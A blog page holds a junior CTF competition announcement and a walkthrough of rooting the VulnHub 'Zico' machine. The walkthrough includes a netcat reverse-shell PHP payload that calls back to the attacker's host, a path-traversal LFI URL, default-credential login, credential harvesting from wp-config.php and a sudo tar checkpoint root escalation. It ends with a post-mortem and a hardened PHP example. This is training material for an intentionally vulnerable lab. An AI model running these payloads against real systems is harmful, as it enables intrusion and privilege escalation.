Articles by "CTF"

Capture The Flag (CTF) is a computer security competition that lets you learn about computer security topics in a fun way. These competitions are usually of two types. Jeopardy-style CTFs have challenges that, when solved, give us a secret text called a flag. This flag is nothing more than a text in a specific format (in this case FLAG = { changing-characters }), and once found it lets us know that we solved the challenge. The junior CTF belongs to this category.
The second type of CTF is called attack-defense. In it, each team must defend a server or a network with vulnerable services from the rest of the teams.

What is the junior CTF?

It is an annual computer security competition in the form of a CTF aimed at people who want to take their first steps in the area of computer security in a playful way.

General CTF issues

Categories & Challenges

There are 6 possible categories: reverse engineering, forensics, web, SQL injection, cryptography and networks. The challenges are of increasing difficulty and the greater the difficulty of the exercise, the higher the score.

Teams

The challenges can be solved individually or by teams of up to 3 people.

Platform

Once a challenge has been resolved and the flag identified, this text should be entered on the platform where the challenges are downloaded and, if correct, the points will be automatically added to the team.

Flag format

The flag of every challenge has the format FLAG = { changing-characters }, where the changing characters are always 32 hexadecimal characters, regardless of upper or lower case. An example flag would be: FLAG = {0123456789abcdef0123456789abcdef}

Awards

  • 1st prize: tickets to the Ekoparty and a Raspberry Pi kit.
  • 2nd prize: tickets to the Ekoparty and an Arduino kit.
  • 3rd prize: tickets to the Ekoparty.
If a winning team has 3 members, each of them will take the indicated prize.

Requirements

  • Bring a computer.
  • We recommend having VirtualBox installed, or being able to boot a Kali Linux image from a USB drive.
  • Be physically present at OLX Argentina to participate (Miñones 2177, CABA, Argentina).
  • No previous knowledge of computer security is necessary. General computer knowledge, such as working in a Linux environment and basic programming, will be useful.
  • Not work, or have worked, in the area of computer security, nor have previously participated in a CTF, given the introductory nature of the event (previous editions of the CTF Junior excepted).

Zico on VulnHub


12 March 2017

Introduction

My friends and I like to solve CTFs on our own, then teach each other how we solved it. This way, we get experience both teaching and learning, and you always understand material you need to explain to someone else better than if you kept it to yourself.
Zico’s author rates the box as “intermediate,” but I’d call it “beginner plus.” The ideas needed to root the box are not complicated, but you need to have a bit of prior knowledge to know that you need to implement them.
Shall we begin?

1. Initial Scanning

Since we are dealing with a VulnHub VM, we need to set it up on our host-only network. This box is intentionally vulnerable, so why hook it up to your real network?
Depending on how you’ve set up your host-only network, you may need to use nmap to determine the machine’s IP.
nmap -sn 192.168.56.0/24

Once you’ve found the box, it’s time to give it a real portscan.
I like to use my benmap script, which runs a few scans and generates
a working directory for the CTF. You can check it out on Github.

The nmap -F scan found some potential avenues of attack:
  • SSH on port 22
  • HTTP on port 80
  • rpcbind on port 111
HTTP is my favorite place to start on CTFs, so we hit it with the triple threat: nikto, dirsearch and fimap.
nikto -h 192.168.56.101 -o nikto_result.txt

Nikto tells us that Apache is a bit obsolete, but nothing else particularly interesting.
Throw that on our “places to dig” list and let’s use dirsearch.
dirsearch -u 'http://192.168.56.101' -e php,html,js,txt,sh --simple-report=dirsearch_quick

We find a lot of interesting filenames, especially the dbadmin directory.
Anything with “admin” in the title may be worth a look.
Finally, we’ll let fimap see if we can dig anywhere we aren’t supposed to be able to. 
fimap -H -d 3 -u "http://192.168.56.101" -w /tmp/fimap_output | tee fimap_result

http://hostname/view.php?page=tools.html smells like file inclusion. 
The use of ?page= may allow us to directly view arbitrary files on the webserver. Instead of using tools.html as an argument, we just insert a file’s full path.
I tried something like ../../../../etc/passwd, but didn’t find success. Maybe we can use this later.
Lastly, we peruse the site in the browser.

Zico’s Shop?
Zico doesn’t seem confident that he is in control of his own site.
Let’s prove that he is right to have doubts and go right for that /dbadmin page.

What have we here?


2. Doing Dirty Deeds in da Database

A PHP database admin page, with an obvious version number. The title of “testdb” hints at a default setup.
A default setup may use a default password.
password: admin

We’re inside.
Those look like password hashes to me.
Our friend Hashbuster should have a look at them.

Not too shabby! Root and user passwords.
I don’t think this db is actually used for anything other than testing, but there is a chance that the same passwords are used to login with SSH.

Nope.
We can see some other useful information on the database page, however.
For one, we are given the test_user database’s full file path.

This information, combined with the Local File Inclusion vulnerability we spotted earlier means we can access these databases by visiting a URL.
We can try some tricks using SQL commands, but I wonder if
these waters have been charted before…
findsploit phpliteadmin

The very first hit matches our phpLiteAdmin version number. 
If you run searchsploit -x 24044, you’ll see a document explaining how the exploit is operated.
We’ll break it down, step by step.
  • Create a new database with a name ending in “.php”.
  • Select this new database and create a new table with one field.
  • Set the field to the “Text” type, and enter a php-command payload as the Default Value.
    I decided to use my most reliable netcat-based reverse-shell.

    &1|nc local.machine.ip.addr PORTNUM > /tmp/f"); ?>
  • Create the table, and set up the listener on your local machine.
nc -lnvp PORTNUM

  • Visiting the database in the browser, using our handy-dandy LFI vulnerability, will run the payload and pop our shell.
http://192.168.56.101/view.php?page=../../../../usr/databases/a.php

3. From www-data to User

This shell could use some improvement, so let’s see if we can’t spawn a bash shell with a tty using python.
which python
which bash
python -c 'import pty;pty.spawn("/bin/bash")'

My “advanced” powers of deduction tell me that we are going to have a user named zico. A user with a home directory, even.
Let’s verify.
ls -la /home
ls -la /home/zico 
Luckily for us, Zico doesn’t seem to mind if we read files in his home directory.
Talk about courteous!
Zico seems to have even left a note behind for himself.
Surely he won’t mind if we read that, too.
cd /home/zico
cat to_do.txt 
Zico seems to be trying out some content management systems for a new website.
The site we went through to get this shell used phpLiteAdmin, so WordPress must be next.
We see WordPress sites all the time in CTFs, and know them well enough to know where to look for the squishy bits.
cd wordpress
ls -l 
Zico hasn’t implemented this site yet, so it may not have been combed through for sensitive info.
wp-config.php can often contain passwords.
grep -i 'pass' wp-config.php

A database password, nice.
Let’s try it with SSH, because, why not?

4. From Zico to Root

As the presumed owner of this box, Zico should be able to get some significant things done. 
sudo -l
tar and zip are a bit strange to see as sudo-enabled commands. Can they be used for code execution?
I searched online, and found some very interesting information at these two sites.
tar can be run with flags that cause it to unarchive with “checkpoints.”
At these points, the process will pause and take an action, then seamlessly resume. 
Since we can run tar as root, we just need to use these checkpoints to run some commands that escalate our privileges.

Running Tar As Root For Fun and Profit

  • Move to a “temporary” folder like /dev/shm and create a file that we will compress.
  • Compress it with tar as Zico. No need to run as root just yet.

  • Unarchive the newly created .tar, making sure to use sudo and including the flags that add a checkpoint and its commands.
    The commands run alongside the tar command, so any output from them will appear in the terminal.
    Our test payload is the (redundant) command echo $(id), which prints the identity of the user who ran the tar command to the terminal.

    If things go according to plan, we should see root’s info.
sudo tar -xf archive.tar --checkpoint=1 --checkpoint-action=exec='echo $(id)'

Our privesc concept is proven.
We can just run /bin/bash as our checkpoint commands to spawn a root shell.
sudo tar -xf archive.tar --checkpoint=1 --checkpoint-action=exec='/bin/bash'

And, we’re root.
Go to the /root directory and grab the flag.
cd /root
ls
cat flag.txt


Post-Mortem

This CTF was purposely made porous, but these vulnerabilities can be found in the real world.
Here’s what made Zico rootable.
Use of Default/Obvious Credentials
  • In this scenario, Zico’s phpLiteAdmin database was just for testing purposes. However, admin is simply not a password that should be in use. It’s just too easy to guess.
  • Had we not been able to gain access to the phpLiteAdmin panel, we may not have gotten any access at all.
Local File Inclusion
  • Serving webpages with ?page= is a recipe for local file inclusion.
  • Only one page was intended to be reached this way, and it wasn’t even the only link to this page on the site.
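The include-by-parameter pattern behind view.php?page= and its fix, as an added example that is not code from the Zico box: the vulnerable handler beside an allowlist version that cannot be steered to /etc/passwd or to a planted .php file. PAGES_DIR, ALLOWED_PAGES and the page names are assumptions.

```php
<?php
// Vulnerable pattern: the request parameter goes straight into include(),
// so "../../../../etc/passwd" is read and a planted .php file is executed.
function render_page_vulnerable(string $page): void
{
    include $page;            // local file inclusion: do not use
}

// Hardened version: the parameter is a key into a fixed allowlist, never a path.
// Assumed layout (not from the original site): static pages live under PAGES_DIR.
const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = [
    'home'  => 'home.html',
    'tools' => 'tools.html',
];

// Returns the absolute file to serve, or null if the request must be refused.
function resolve_page(string $page): ?string
{
    // 1. The key must exist in the allowlist; "..", "/", ".php" never match a key.
    if (!array_key_exists($page, ALLOWED_PAGES)) {
        return null;
    }
    // 2. Defence in depth: resolve symlinks and confirm the file is still inside PAGES_DIR.
    $base = realpath(PAGES_DIR);
    $file = realpath(PAGES_DIR . '/' . ALLOWED_PAGES[$page]);
    if ($base === false || $file === false
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

function render_page(string $page): void
{
    $file = resolve_page($page);
    if ($file === null) {
        http_response_code(404);
        echo 'Page not found';
        return;
    }
    // readfile() serves the content as data; include() would execute any PHP inside it.
    header('Content-Type: text/html; charset=utf-8');
    readfile($file);
}

render_page($_GET['page'] ?? 'home');
```

With this handler, ?page=../../../../usr/databases/a.php gets a 404 instead of running the planted payload, which is the fix the post-mortem is asking for.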
Outdated Versions of 3rd Party Software
  • The phpLiteAdmin version used here isn’t even available for download from the phpLiteAdmin website.
  • The code injection vulnerability we used to run our php payload was patched in later versions.
Credential Reuse
  • The password used by www-data in the wp-config.php file to access the website database was the same as zico’s user password.
Least Privilege Violations
  • www-data had unnecessary read access to zico’s home folder.
  • If zico isn’t a superuser, I’m not sure what reason they would need to have to run tar and zip as root.

Thanks for reading!